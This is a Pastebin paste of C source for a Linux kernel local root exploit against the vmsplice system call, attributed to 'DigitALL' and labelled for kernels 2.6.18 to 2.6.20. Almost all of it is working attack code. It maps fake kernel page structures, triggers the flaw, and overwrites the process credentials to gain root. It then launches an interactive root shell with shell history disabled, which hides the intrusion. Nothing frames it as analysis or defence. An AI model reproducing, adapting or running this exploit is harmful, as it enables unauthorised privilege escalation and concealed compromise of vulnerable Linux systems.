Guest User

Untitled

a guest
Apr 26th, 2018
76
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.88 KB | None | 0 0
  1. Linux 2.6.18-20 2009 Local Root Exploit
  2.  
  3. # Author: DigitALL
  4. # Version: 2.6.18-20
  5. # Tested on: Linux System
  6. # Greetz To: Zombie KroNicKq and All 1923turk.Biz Members
  7. # Code : 2.6.18 2008 Exploit's İs Edited 2009 Version.I Am Tested 2.6.18-20 2009 Linux is Rooted.Coming Soon.By DigitALL
  8.  
  9. #define _GNU_SOURCE
  10. #include <stdio.h>
  11. #include <errno.h>
  12. #include <stdlib.h>
  13. #include <string.h>
  14. #include <malloc.h>
  15. #include <limits.h>
  16. #include <signal.h>
  17. #include <unistd.h>
  18. #include <sys/uio.h>
  19. #include <sys/mman.h>
  20. #include <asm/page.h>
  21. #define __KERNEL__
  22. #include <asm/unistd.h>
  23.  
  24. #define PIPE_BUFFERS 16
  25. #define PG_compound 14
  26. #define uint unsigned int
  27. #define static_inline static inline __attribute__((always_inline))
  28. #define STACK(x) (x + sizeof(x) - 40)
  29.  
  30. struct page {
  31. unsigned long flags;
  32. int count;
  33. int mapcount;
  34. unsigned long private;
  35. void *mapping;
  36. unsigned long index;
  37. struct { long next, prev; } lru;
  38. };
  39.  
  40. void exit_code();
  41. char exit_stack[1024 * 1024];
  42.  
  43. void die(char *msg, int err)
  44. {
  45. printf(err ? "[-] %s: %s\n" : "[-] %s\n", msg, strerror(err));
  46. fflush(stdout);
  47. fflush(stderr);
  48. exit(1);
  49. }
  50.  
  51. #if defined (__i386__)
  52.  
  53. #ifndef __NR_vmsplice
  54. #define __NR_vmsplice 316
  55. #endif
  56.  
  57. #define USER_CS 0x73
  58. #define USER_SS 0x7b
  59. #define USER_FL 0x246
  60.  
  61. static_inline
  62. void exit_kernel()
  63. {
  64. __asm__ __volatile__ (
  65. "movl %0, 0x10(%%esp) ;"
  66. "movl %1, 0x0c(%%esp) ;"
  67. "movl %2, 0x08(%%esp) ;"
  68. "movl %3, 0x04(%%esp) ;"
  69. "movl %4, 0x00(%%esp) ;"
  70. "iret"
  71. : : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
  72. "i" (USER_CS), "r" (exit_code)
  73. );
  74. }
  75.  
  76. static_inline
  77. void * get_current()
  78. {
  79. unsigned long curr;
  80. __asm__ __volatile__ (
  81. "movl %%esp, %%eax ;"
  82. "andl %1, %%eax ;"
  83. "movl (%%eax), %0"
  84. : "=r" (curr)
  85. : "i" (~8191)
  86. );
  87. return (void *) curr;
  88. }
  89.  
  90. #elif defined (__x86_64__)
  91.  
  92. #ifndef __NR_vmsplice
  93. #define __NR_vmsplice 278
  94. #endif
  95.  
  96. #define USER_CS 0x23
  97. #define USER_SS 0x2b
  98. #define USER_FL 0x246
  99.  
  100. static_inline
  101. void exit_kernel()
  102. {
  103. __asm__ __volatile__ (
  104. "swapgs ;"
  105. "movq %0, 0x20(%%rsp) ;"
  106. "movq %1, 0x18(%%rsp) ;"
  107. "movq %2, 0x10(%%rsp) ;"
  108. "movq %3, 0x08(%%rsp) ;"
  109. "movq %4, 0x00(%%rsp) ;"
  110. "iretq"
  111. : : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
  112. "i" (USER_CS), "r" (exit_code)
  113. );
  114. }
  115.  
  116. static_inline
  117. void * get_current()
  118. {
  119. unsigned long curr;
  120. __asm__ __volatile__ (
  121. "movq %%gs:(0), %0"
  122. : "=r" (curr)
  123. );
  124. return (void *) curr;
  125. }
  126.  
  127. #else
  128. #error "unsupported arch"
  129. #endif
  130.  
  131. #if defined (_syscall4)
  132. #define __NR__vmsplice __NR_vmsplice
  133. _syscall4(
  134. long, _vmsplice,
  135. int, fd,
  136. struct iovec *, iov,
  137. unsigned long, nr_segs,
  138. unsigned int, flags)
  139.  
  140. #else
  141. #define _vmsplice(fd,io,nr,fl) syscall(__NR_vmsplice, (fd), (io), (nr), (fl))
  142. #endif
  143.  
  144. static uint uid, gid;
  145.  
  146. void kernel_code()
  147. {
  148. int i;
  149. uint *p = get_current();
  150.  
  151. for (i = 0; i < 1024-13; i++) {
  152. if (p[0] == uid && p[1] == uid &&
  153. p[2] == uid && p[3] == uid &&
  154. p[4] == gid && p[5] == gid &&
  155. p[6] == gid && p[7] == gid) {
  156. p[0] = p[1] = p[2] = p[3] = 0;
  157. p[4] = p[5] = p[6] = p[7] = 0;
  158. p = (uint *) ((char *)(p + 8) + sizeof(void *));
  159. p[0] = p[1] = p[2] = ~0;
  160. break;
  161. }
  162. p++;
  163. }
  164.  
  165. exit_kernel();
  166. }
  167.  
  168. void exit_code()
  169. {
  170. if (getuid() != 0)
  171. die("wtf", 0);
  172.  
  173. printf("[+] root\n");
  174. putenv("HISTFILE=/dev/null");
  175. execl("/bin/bash", "bash", "-i", NULL);
  176. die("/bin/bash", errno);
  177. }
  178.  
  179. int main(int argc, char *argv[])
  180. {
  181. int pi[2];
  182. size_t map_size;
  183. char * map_addr;
  184. struct iovec iov;
  185. struct page * pages[5];
  186.  
  187. uid = getuid();
  188. gid = getgid();
  189. setresuid(uid, uid, uid);
  190. setresgid(gid, gid, gid);
  191.  
  192. printf("-----------------------------------\n");
  193. printf(" Linux 2.6.18-20 2009 Local Root Exploit\n");
  194. printf(" By DigitALL\n");
  195. printf("-----------------------------------\n");
  196.  
  197. if (!uid || !gid)
  198. die("!@#$", 0);
  199.  
  200. /*****/
  201. pages[0] = *(void **) &(int[2]){0,PAGE_SIZE};
  202. pages[1] = pages[0] + 1;
  203.  
  204. map_size = PAGE_SIZE;
  205. map_addr = mmap(pages[0], map_size, PROT_READ | PROT_WRITE,
  206. MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
  207. if (map_addr == MAP_FAILED)
  208. die("mmap", errno);
  209.  
  210. memset(map_addr, 0, map_size);
  211. printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
  212. printf("[+] page: 0x%lx\n", pages[0]);
  213. printf("[+] page: 0x%lx\n", pages[1]);
  214.  
  215. pages[0]->flags = 1 << PG_compound;
  216. pages[0]->private = (unsigned long) pages[0];
  217. pages[0]->count = 1;
  218. pages[1]->lru.next = (long) kernel_code;
  219.  
  220. /*****/
  221. pages[2] = *(void **) pages[0];
  222. pages[3] = pages[2] + 1;
  223.  
  224. map_size = PAGE_SIZE;
  225. map_addr = mmap(pages[2], map_size, PROT_READ | PROT_WRITE,
  226. MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
  227. if (map_addr == MAP_FAILED)
  228. die("mmap", errno);
  229.  
  230. memset(map_addr, 0, map_size);
  231. printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
  232. printf("[+] page: 0x%lx\n", pages[2]);
  233. printf("[+] page: 0x%lx\n", pages[3]);
  234.  
  235. pages[2]->flags = 1 << PG_compound;
  236. pages[2]->private = (unsigned long) pages[2];
  237. pages[2]->count = 1;
  238. pages[3]->lru.next = (long) kernel_code;
  239.  
  240. /*****/
  241. pages[4] = *(void **) &(int[2]){PAGE_SIZE,0};
  242. map_size = PAGE_SIZE;
  243. map_addr = mmap(pages[4], map_size, PROT_READ | PROT_WRITE,
  244. MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
  245. if (map_addr == MAP_FAILED)
  246. die("mmap", errno);
  247. memset(map_addr, 0, map_size);
  248. printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
  249. printf("[+] page: 0x%lx\n", pages[4]);
  250.  
  251. /*****/
  252. map_size = (PIPE_BUFFERS * 3 + 2) * PAGE_SIZE;
  253. map_addr = mmap(NULL, map_size, PROT_READ | PROT_WRITE,
  254. MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
  255. if (map_addr == MAP_FAILED)
  256. die("mmap", errno);
  257.  
  258. memset(map_addr, 0, map_size);
  259. printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
  260.  
  261. /*****/
  262. map_size -= 2 * PAGE_SIZE;
  263. if (munmap(map_addr + map_size, PAGE_SIZE) < 0)
  264. die("munmap", errno);
  265.  
  266. /*****/
  267. if (pipe(pi) < 0) die("pipe", errno);
  268. close(pi[0]);
  269.  
  270. iov.iov_base = map_addr;
  271. iov.iov_len = ULONG_MAX;
  272.  
  273. signal(SIGPIPE, exit_code);
  274. _vmsplice(pi[1], &iov, 1, 0);
  275. die("vmsplice", errno);
  276. return 0;
  277. }
Add Comment
Please, Sign In to add comment